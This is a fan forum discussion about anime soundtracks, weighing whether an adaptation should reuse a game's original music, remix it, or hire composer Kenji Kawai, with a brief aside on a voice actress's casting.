If they get Kenji Kawai to do the music, then it's fine. He's quite skilled, and did a decent job with Fate/stay night and Higurashi.

It annoys me when studios (like KyoAni) just reuse the game music anyways, since they don't bother to rearrange/remix it.

I like the game's music too, so I would love to see an updated/enhanced version for the anime. If not, then original music that fits the action onscreen. I'd prefer actual game's OST last, since it wasn't created for an anime to begin with.

I would disagree strongly with this. Music is vital in establishing the feel of a game; keeping the music can assist in the successful translation of that atmosphere from game to anime (this only works if the OST was good to being with). Sure, one could definitely argue that creating an all-new or remixed soundtrack while staying true to the original is harder, but is the risk of fucking up the feel of the piece worth it? Why fix something that isn't broken?

Use of the original soundtrack can also help minimize the rejection of the anime by fans of the game.

So rather than always being stinginess or laziness, I would say that the use of the original music can potentially be both a clever strategical move and a way of showing respect for the original work. If executed correctly.

Even artists can fuck up their own work. They end up producing something that they think is better but everyone else thinks is worse. Or something that appeals to a different group of people than the original.

Kenji Kawai was quite average for Higurashi. Except for one theme (The sad one with a woman's voice huming in it) and another for funnier reasons (The one used in Kai previews), there was nothing to write home about in Higurashi's OST.

Japanese otakus aren't worried about Kugimiya's Shannon, because it's famous that she is basically a good actress and has various voices.
